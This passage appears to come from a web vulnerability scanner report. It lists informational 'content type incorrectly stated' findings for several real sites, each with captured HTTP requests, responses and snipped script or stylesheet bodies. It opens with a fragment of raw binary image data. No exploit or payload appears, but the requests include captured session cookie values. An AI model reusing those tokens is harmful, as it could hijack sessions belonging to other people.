...IHDR...d...d.....p..T....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..GWIDATx^..ux...6.9gN{
U.P.......\..!....%..wwwwww.!....w....o..m....=.^W......Z...7_|....+.
...[SNIP]...
35.35. http://learn.shavlik.com/shavlik/userCheck.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/userCheck.cfm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /shavlik/userCheck.cfm HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.6.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

num0
35.36. http://limg.imgsmail.ru/mail/ru/css/search_top.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://limg.imgsmail.ru
Path:   /mail/ru/css/search_top.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /mail/ru/css/search_top.css?1 HTTP/1.1
Host: limg.imgsmail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 25 Apr 2011 14:24:54 GMT
Content-Type: text/css
Last-Modified: Fri, 17 Sep 2010 12:08:28 GMT
Connection: keep-alive
Expires: Mon, 02 May 2011 14:24:54 GMT
Cache-Control: max-age=604800
Content-Length: 4085

/* Other */
td.on div div div {padding:0 !important;}
td.on div div {padding: 2px 5px;}
.search_bare {width:99%;}
.search_bare td{vertical-align:middle; color: #FFFFFF;}
.search_bare .inp{width:5
...[SNIP]...
35.37. http://mbox9e.offermatica.com/m2/eset/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");
35.38. http://my.webalta.ru/feed/l.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /feed/l.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /feed/l.php?url=&id=80 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:09:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.9
Content-Length: 59948

... ...<?xml version="1.0" encoding="utf-8"?><response type="gameboss ver2.0"><result type="games">
<ITEM>
<ID>1093</ID>
<RATE>9999</RATE>
<NAME_URL>vanishing_hitchhiker_rus</NAME_URL>
<TYPE>65</TYP
...[SNIP]...
35.39. http://my.webalta.ru/public/engine/app.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/app.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/app.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:52 GMT
Content-Type: application/x-javascript
Content-Length: 27122
Last-Modified: Tue, 23 Dec 2008 15:25:59 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:52 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function fNewBlock(block_data)
{
       function fLdrTransfer(data)
       {
           if(!fw.data.isObj(data)) return false;
           var res = fw.io.transfer(this._iohndl, data);
           return true;
       }
       function
...[SNIP]...
35.40. http://my.webalta.ru/public/engine/catalog/general.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/catalog/general.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/catalog/general.txt HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:58 GMT
Content-Type: text/plain
Connection: keep-alive
Keep-Alive: timeout=20
Last-Modified: Tue, 14 Apr 2009 09:21:09 GMT
ETag: "15d8393-66f-49e45585"
Accept-Ranges: bytes
Content-Length: 1647

...{widgets:{
0:{name:'...... ........',type:'gameboss',url_id:'80'},
1:{name:'........................ ........ ........',type:'r4games',url_id:'',par_1:''},
2:{name:'............ - ef the game',t
...[SNIP]...
35.41. http://my.webalta.ru/public/engine/fw/fw_cookies.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/fw/fw_cookies.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/fw/fw_cookies.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:30 GMT
Content-Type: application/x-javascript
Content-Length: 2347
Last-Modified: Wed, 12 Nov 2008 09:08:15 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:30 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setCookie( name, value, path ) {

var expdate = new Date ();
expdate.setTime(expdate.getTime() + (3650 * 24 * 60 * 60 * 1000));
var str2 = "expires=" + expdate.toGMTString();
var
...[SNIP]...
35.42. http://my.webalta.ru/public/engine/move.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/move.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/move.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:28:51 GMT
Content-Type: application/x-javascript
Content-Length: 34213
Last-Modified: Wed, 26 Nov 2008 08:04:50 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:28:51 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function setOpacity(value) {
testObj.style.opacity = value/10;
testObj.style.filter = 'alpha(opacity=' + value*10 + ')';
}


function hasClassName(elem, cname)
{
if (!elem) return
...[SNIP]...
35.43. http://my.webalta.ru/public/engine/page.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/page.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/page.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: application/x-javascript
Content-Length: 28424
Last-Modified: Tue, 23 Dec 2008 15:25:56 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:30:07 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function $(e_id)
{
return document.getElementById(e_id);
}

function create_El(s_div,s_parent,s_id,s_width,s_height,s_top,s_left,s_visibility,s_class,s_html)
{//................ .........
...[SNIP]...
35.44. http://my.webalta.ru/public/engine/reader.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/reader.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/reader.js?version=1.1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:29:23 GMT
Content-Type: application/x-javascript
Content-Length: 15804
Last-Modified: Tue, 09 Dec 2008 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:29:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __reader = new rssReader();

// ............ ...................... ...... ............. .......... ........................ ...... ............ ...........
var __parser = new Object();

_
...[SNIP]...
35.45. http://my.webalta.ru/public/engine/settings.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/settings.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/settings.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:12 GMT
Content-Type: application/x-javascript
Content-Length: 3396
Last-Modified: Tue, 23 Dec 2008 15:27:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...
var fw={};var block={};var page={}; var page_load={}; var block_prop={};var g_st={};
var save_key = false;
function f_new(name)
{
       this.Modules={};
   
}
var Catalog = {};
var Catalog_ =
...[SNIP]...
35.46. http://my.webalta.ru/public/engine/skinpacks.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/skinpacks.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/skinpacks.js?version=1.0 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:46 GMT
Content-Type: application/x-javascript
Content-Length: 2349
Last-Modified: Mon, 24 Nov 2008 13:34:42 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:26:46 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __skinpack = new skinPacks();
//__skinpack.apply();

function skinPacks()
{
   this.theme_color = '#52677A';

   this.bg_top_color = '#fff';
   this.bg_top_img = '/public/visual/theme/top/top
...[SNIP]...
35.47. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
35.48. http://my.webalta.ru/public/engine/widget/browse/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/browse/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/browse/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:33 GMT
Content-Type: application/x-javascript
Content-Length: 2882
Last-Modified: Mon, 22 Dec 2008 08:59:36 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:33 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function browse_fNewBlock_2()
{    
       // .............. ..........
   function _options()
   {
       return '';
       var id = this.d.b_index;
       var html = '';

           html += '<div id="' + id + '_options" s
...[SNIP]...
35.49. http://my.webalta.ru/public/engine/widget/flash/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/flash/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/flash/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 5003
Last-Modified: Wed, 12 Nov 2008 09:08:18 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function flash_f_new_block_2(id_block)
{    

   // ID ..............
   this.d._id = id_block;

   // ..........................
   function init()
   {
       var el = document.getElementById(this.name_bl
...[SNIP]...
35.50. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/gameboss/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/gameboss/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 6277
Last-Modified: Fri, 21 Nov 2008 06:52:06 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function gameboss_fNewBlock_2()
{    
   function fLdrReceive(txt)
       {

           txt=txt.replace(/<\?xml.*?>/g, " ");
           txt=txt.replace(/<img.*?>/g, " ");
           txt=txt.replace(/&lt;.*?&gt;/g, " ");
           
...[SNIP]...
35.51. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/engine/widget/labpixies/widget_script.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/labpixies/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:31:57 GMT
Content-Type: application/x-javascript
Content-Length: 2358
Last-Modified: Mon, 24 Nov 2008 13:40:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:31:57 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function labpixies_fNewBlock_2()
{    
   function fLdrReceive(txt)
       {        
           function substring(at, to, str)
       {
               start_pos = str.indexOf(at) + at.length;
               pars = str.substr(start_pos);
       
...[SNIP]...
35.52. http://my.webalta.ru/public/visual/index.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/index.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/index.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:00 GMT
Content-Type: text/css
Content-Length: 9788
Last-Modified: Wed, 12 Nov 2008 09:09:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:00 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ......... ......
   ...... .... .. ......... .. index.html
   ......... ..........: 08.11.08
   ...., .........., .. ..... .... .... ... .....

*/

body { min-width: 600px; padding: 0px; margi
...[SNIP]...
35.53. http://my.webalta.ru/public/visual/theme.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/theme.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/theme.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:12 GMT
Content-Type: text/css
Content-Length: 2449
Last-Modified: Tue, 18 Nov 2008 16:11:07 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ............ ......
   ..... ........ . ........... .. ...., .. .. ......... ............ ...
   ......... ..........: 09.11.08
   ...., .........., .. ..... .... .... ... .....

*/

/* .... ..
...[SNIP]...
35.54. http://my.webalta.ru/public/visual/themes/css.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.webalta.ru
Path:   /public/visual/themes/css.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/themes/css.php?st=theme1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
